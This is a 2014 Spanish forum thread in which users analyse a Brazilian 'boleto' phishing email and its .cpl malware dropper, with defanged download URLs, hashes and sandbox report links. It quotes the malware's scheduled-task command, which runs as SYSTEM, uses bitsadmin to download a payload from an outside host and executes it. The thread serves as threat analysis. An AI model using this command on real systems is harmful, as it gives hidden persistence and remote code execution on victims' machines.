|
Título: BoletoSetembro.cpl Publicado por: r32 en 2 Septiembre 2014, 20:07 pm Este mensaje lo recibí ayer, me resultó curioso y saqué algo de info, aunque de momento solo estático.
Aquí el código del mensaje de hotmail: Código: x-store-info:4r51+eLowCe79NzwdU2kRwMf1FfZT+JrOrNqUS7nEGaWI7+e07AEo5CA6K8iX7qtKtPv721BY5mo0WEcsdQP8XzOoWHLaYmOuMSRVnhqmiCChEz1ym6wxKg9LOLCqjdzXXpVvv2L+c8= VT: https://www.virustotal.com/es/file/1784d146c729adc0586b4ee2b21de295987e47824f549b8e3e3d6dc3d6d21a57/analysis/1409643892/ Al hacer click sobre el texto nos descargará este archivo: hxtp://bukhamees.com/highslide/graphics/cav.php --> hxtp://www.arnetltd.com/BoletoSetembro.zip Archivo descomprimido: BoletoSetembro.cpl Info sobre el dominio: http://whois.domaintools.com/arnetltd.com Citar User ID at Hotmail.com: USER_ID=mixelyx@hotmail.com De momento el análisis ha sido algo estático, no tengo el otro sistema donde hago las pruebas a punto y de momento esto es lo que aporto. Aquí teneis el análisis en Anubis: https://anubis.iseclab.org/?action=result&task_id=1bf98778208944e7461a0d1e8b5f2ad9e&call=first Traffic.pcap: https://anubis.iseclab.org/?action=result&task_id=1bf98778208944e7461a0d1e8b5f2ad9e&download=traffic.pcap Un dato curioso en el análisis de AI: Citar "C:\WINDOWS\system32\cmd.exe" /c schtasks /CREATE /SC onstart /TN "Adobe Update" /TR "cmd /c ping -n 900 127.0.0.1 &bitsadmin /transfer My /Download /PRIORITY HIGH hxtp://gerenciador.es/a001.jpg %TEMP%\a001.cpl &%TEMP%\a001.cpl" /ru SYSTEM Echando un ojo al tráfio de datos se observa como desc arga otro archivo desde el siguiente dominio: hxtp://gerenciador2015.com.br/ Descargará este otro archivo: hxtp://gerenciador2015.com.br/a001/bitsadmin.exe VT: https://www.virustotal.com/es/file/f910f378b99f06b5f936e7dc607d5991c39b676f4f2edcaae35a5d4262573968/analysis/1409701400/ --> 0 / 55 Citar El archivo ya ha sido analizado Este archivo ya fue analizado por VirusTotal el 2014-08-27 14:37:08 UTC, it was first analysed by VirusTotal on 2008-09-28 16:46:23 UTC. Detecciones: 0/55 Puede ver el último análisis o reanalizarlo otra vez ahora. AI: https://anubis.iseclab.org/?action=result&task_id=14a121b02de6fc494d9cb0d297e9fa0d2 (https://anubis.iseclab.org/?action=result&task_id=14a121b02de6fc494d9cb0d297e9fa0d2) Saludos. Título: Re: BoletoSetembro.cpl Publicado por: r32 en 5 Septiembre 2014, 18:43 pm Envié el archivo "bitsadmin.exe" a Kaspersky Lab para que le echaran un vistazo, no era normal que descargase ese ejecutable.
La respuesta fue que no ven nada raro en el comportamiento de ese ejecutable, pero..... Si lo descarga es para algo, no? si nos fijamos bien en las funciones que puede llegar a realizar vemos que lo utiliza como túnel, a traves de el, crea un proceso y utiliza las funciones necesarias, veamos que puede hacer. Si echamos un vistazo a la MSDN vemos todas las funciones que puede llegar a usar: http://msdn.microsoft.com/en-us/library/aa362813%28v=vs.85%29.aspx (http://msdn.microsoft.com/en-us/library/aa362813%28v=vs.85%29.aspx) Puede hacer uso de red, listado de archivos, conexión bajo proxy. Aquí un listado más completo de sus funciones: http://msdn.microsoft.com/en-us/library/aa362812%28v=vs.85%29.aspx (http://msdn.microsoft.com/en-us/library/aa362812%28v=vs.85%29.aspx) BITSAdmin Tool segun veo es para win XP, lo podemos descargar en este paquete: Windows XP Service Pack 2 Support Tools: Descarga: http://www.microsoft.com/en-us/download/details.aspx?id=18546 (http://www.microsoft.com/en-us/download/details.aspx?id=18546) D.Directa: http://download.microsoft.com/download/d/3/8/d38066aa-4e37-4ae8-bce3-a4ce662b2024/WindowsXP-KB838079-SupportTools-ENU.exe (http://download.microsoft.com/download/d/3/8/d38066aa-4e37-4ae8-bce3-a4ce662b2024/WindowsXP-KB838079-SupportTools-ENU.exe) Podemos extraerlo con winrar por ejemplo: (http://oi62.tinypic.com/2m3lqon.jpg) Ahora solo tenemos que volver a extraer el contenido del archivo "support.cab" (4.699 KB), aparecerán todos los archivos incluido "bitsadmin.exe". (http://oi57.tinypic.com/wumj3k.jpg) Vemos que, tanto peso, como hash coinciden, no han tocado para nada ese ejecutable, por eso comentaba lo del puente. El archivo "BoletoSetembro.cpl" es el que lo controla, aunque aun no he podido probarlo. Otro archivo que descarga es una dll (Anonymizer.dll), desde aquí: hxtp://gerenciador2015.com.br/a001/Anonymizer.dll (SHA256: 6123b093cfdd904db6932e55a3431e70bc0860a2dca4441acd41e699fbc35597) Otro 0/55: VT: https://www.virustotal.com/es/file/6123b093cfdd904db6932e55a3431e70bc0860a2dca4441acd41e699fbc35597/analysis/1409937424/ (https://www.virustotal.com/es/file/6123b093cfdd904db6932e55a3431e70bc0860a2dca4441acd41e699fbc35597/analysis/1409937424/) AI: https://anubis.iseclab.org/?action=result&task_id=10be27ac4bb61f4f4d9e7557a9bb888b6 (https://anubis.iseclab.org/?action=result&task_id=10be27ac4bb61f4f4d9e7557a9bb888b6) Citar Processes Created: Executable Command Line C:\WINDOWS\system32\regsvr32.exe regsvr32.exe /u /s .\d1.tmp.dll Realiza muchisimos cambios esta dll. Saludos. Título: Re: BoletoSetembro.cpl Publicado por: x64core en 7 Septiembre 2014, 23:24 pm El archivo bitsadmin.exe es legitimo, malware descargando, 'dropeando' archivos legitimos no es nuevo, lo hacen para
confundir el analisis o para evadir el analisis de algunos Antivirus que paran de analizar cuando verifican algun archivo legitimo o que este firmado tambien para confundir al usuario. Título: Re: BoletoSetembro.cpl Publicado por: r32 en 20 Septiembre 2014, 03:25 am Han cambiado de estrategia, han subido un geolocalizador de ip´s, tienen su ftp, aqui el paste con los datos:
VT: https://www.virustotal.com/es/file/7f72782d38e79a70111c0d9ab6bb1b73825e10651d46e6d06e356c3cf19910c5/analysis/1411175821/ AI: https://anubis.iseclab.org/?action=result&task_id=1b25f2bb32a44c174adaf3b4046176398&call=first Traffic: https://anubis.iseclab.org/?action=result&task_id=1b25f2bb32a44c174adaf3b4046176398&download=traffic.pcap Name Query Type Query Result geoip.s12.com.br DNS_TYPE_A 23.246.231.82 FTP: xftp://geoip.s12.com.br http://pastebin.com/rTWPZ24q A ver que sorpresita esconde, aun no he mirado del todo. Título: Re: BoletoSetembro.cpl Publicado por: r32 en 23 Septiembre 2014, 21:13 pm Otro intento....
Segue em anexo a 2 via do boleto, Dpto Juridico. Paste: http://pastebin.com/tQjzEtqT Luego subo más. Saludos. |